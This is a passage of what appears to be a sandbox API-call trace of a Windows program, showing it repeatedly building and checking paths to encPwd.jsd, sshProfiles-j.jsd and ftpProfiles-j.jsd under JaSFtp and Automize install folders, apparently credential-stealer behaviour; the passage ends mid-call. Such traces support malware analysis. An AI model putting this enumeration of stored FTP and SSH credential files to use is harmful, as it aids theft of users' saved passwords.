wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 63 [0114.289] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.290] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.290] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.291] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.291] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.291] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.292] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0114.292] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.292] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.293] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.294] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.294] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.295] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.296] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 42 [0114.296] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x58) returned 0x5c9390 [0114.296] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.297] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\encPwd.jsd") returned 0 [0114.298] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.298] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.298] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.299] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 63 [0114.299] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.300] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.304] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.305] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.305] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.306] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.307] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0114.307] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.307] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.308] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.309] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.309] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.310] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.310] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 42 [0114.311] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x58) returned 0x5c9390 [0114.311] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.312] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\encPwd.jsd") returned 0 [0114.313] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.313] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.314] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 63 [0114.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.315] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.316] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.316] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.318] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.319] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.320] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0114.320] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.320] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.321] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.322] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.322] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.323] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.323] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 42 [0114.324] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x58) returned 0x5c9390 [0114.324] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.325] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\encPwd.jsd") returned 0 [0114.326] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.326] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.326] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.327] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 63 [0114.327] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.328] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.328] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.329] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.329] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.330] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.330] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0114.330] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.331] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.332] PathFileExistsW (pszPath="C:\\Program Files (x86)\\JaSFtp14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.332] GetProcessHeap () returned 0x5b0000 [0114.332] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.333] GetProcessHeap () returned 0x5b0000 [0114.333] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.333] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.334] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 43 [0114.334] GetProcessHeap () returned 0x5b0000 [0114.334] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5a) returned 0x5c9390 [0114.334] GetProcessHeap () returned 0x5b0000 [0114.334] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.335] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\encPwd.jsd") returned 0 [0114.336] GetProcessHeap () returned 0x5b0000 [0114.336] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.336] GetProcessHeap () returned 0x5b0000 [0114.336] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.337] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.337] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 64 [0114.337] GetProcessHeap () returned 0x5b0000 [0114.337] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.337] GetProcessHeap () returned 0x5b0000 [0114.338] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.339] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.339] GetProcessHeap () returned 0x5b0000 [0114.339] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.339] GetProcessHeap () returned 0x5b0000 [0114.339] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.340] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.341] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0114.341] GetProcessHeap () returned 0x5b0000 [0114.341] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.341] GetProcessHeap () returned 0x5b0000 [0114.341] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.342] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.342] GetProcessHeap () returned 0x5b0000 [0114.342] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.342] GetProcessHeap () returned 0x5b0000 [0114.342] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.343] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.344] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 43 [0114.344] GetProcessHeap () returned 0x5b0000 [0114.344] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5a) returned 0x5c9390 [0114.344] GetProcessHeap () returned 0x5b0000 [0114.344] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.345] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\encPwd.jsd") returned 0 [0114.345] GetProcessHeap () returned 0x5b0000 [0114.346] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.346] GetProcessHeap () returned 0x5b0000 [0114.346] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.346] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.347] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 64 [0114.347] GetProcessHeap () returned 0x5b0000 [0114.347] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.347] GetProcessHeap () returned 0x5b0000 [0114.347] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.349] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.349] GetProcessHeap () returned 0x5b0000 [0114.349] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.349] GetProcessHeap () returned 0x5b0000 [0114.349] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.350] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.351] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0114.351] GetProcessHeap () returned 0x5b0000 [0114.351] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.351] GetProcessHeap () returned 0x5b0000 [0114.351] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.352] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.352] GetProcessHeap () returned 0x5b0000 [0114.353] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.353] GetProcessHeap () returned 0x5b0000 [0114.353] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.353] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.354] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 43 [0114.354] GetProcessHeap () returned 0x5b0000 [0114.354] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5a) returned 0x5c9390 [0114.354] GetProcessHeap () returned 0x5b0000 [0114.355] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.356] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\encPwd.jsd") returned 0 [0114.356] GetProcessHeap () returned 0x5b0000 [0114.356] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.356] GetProcessHeap () returned 0x5b0000 [0114.356] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.357] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.358] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 64 [0114.358] GetProcessHeap () returned 0x5b0000 [0114.358] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.358] GetProcessHeap () returned 0x5b0000 [0114.358] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.359] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.359] GetProcessHeap () returned 0x5b0000 [0114.360] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.360] GetProcessHeap () returned 0x5b0000 [0114.360] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.360] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.361] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0114.361] GetProcessHeap () returned 0x5b0000 [0114.361] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.361] GetProcessHeap () returned 0x5b0000 [0114.362] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.363] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.363] GetProcessHeap () returned 0x5b0000 [0114.363] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.365] GetProcessHeap () returned 0x5b0000 [0114.365] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.366] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.366] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 44 [0114.366] GetProcessHeap () returned 0x5b0000 [0114.367] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5c9390 [0114.367] GetProcessHeap () returned 0x5b0000 [0114.367] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.368] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 0 [0114.368] GetProcessHeap () returned 0x5b0000 [0114.368] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.368] GetProcessHeap () returned 0x5b0000 [0114.368] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.369] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.370] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 65 [0114.370] GetProcessHeap () returned 0x5b0000 [0114.370] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c9390 [0114.370] GetProcessHeap () returned 0x5b0000 [0114.370] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.371] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.371] GetProcessHeap () returned 0x5b0000 [0114.372] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.372] GetProcessHeap () returned 0x5b0000 [0114.372] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.373] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.373] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0114.373] GetProcessHeap () returned 0x5b0000 [0114.373] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c9390 [0114.373] GetProcessHeap () returned 0x5b0000 [0114.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.375] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.375] GetProcessHeap () returned 0x5b0000 [0114.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.375] GetProcessHeap () returned 0x5b0000 [0114.375] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.376] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.377] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 44 [0114.377] GetProcessHeap () returned 0x5b0000 [0114.377] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5c9390 [0114.377] GetProcessHeap () returned 0x5b0000 [0114.377] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.378] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.378] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 0 [0114.378] GetProcessHeap () returned 0x5b0000 [0114.379] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.380] GetProcessHeap () returned 0x5b0000 [0114.380] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.381] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.382] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 65 [0114.382] GetProcessHeap () returned 0x5b0000 [0114.382] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c9390 [0114.382] GetProcessHeap () returned 0x5b0000 [0114.382] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.383] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.384] GetProcessHeap () returned 0x5b0000 [0114.384] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.384] GetProcessHeap () returned 0x5b0000 [0114.384] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.384] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.385] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0114.385] GetProcessHeap () returned 0x5b0000 [0114.385] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x86) returned 0x5c9390 [0114.385] GetProcessHeap () returned 0x5b0000 [0114.386] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.386] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.387] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.387] GetProcessHeap () returned 0x5b0000 [0114.387] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.387] GetProcessHeap () returned 0x5b0000 [0114.387] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.388] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.388] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 44 [0114.388] GetProcessHeap () returned 0x5b0000 [0114.388] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5c9390 [0114.388] GetProcessHeap () returned 0x5b0000 [0114.389] HeapFree (in: hHeap=0x5b0000, 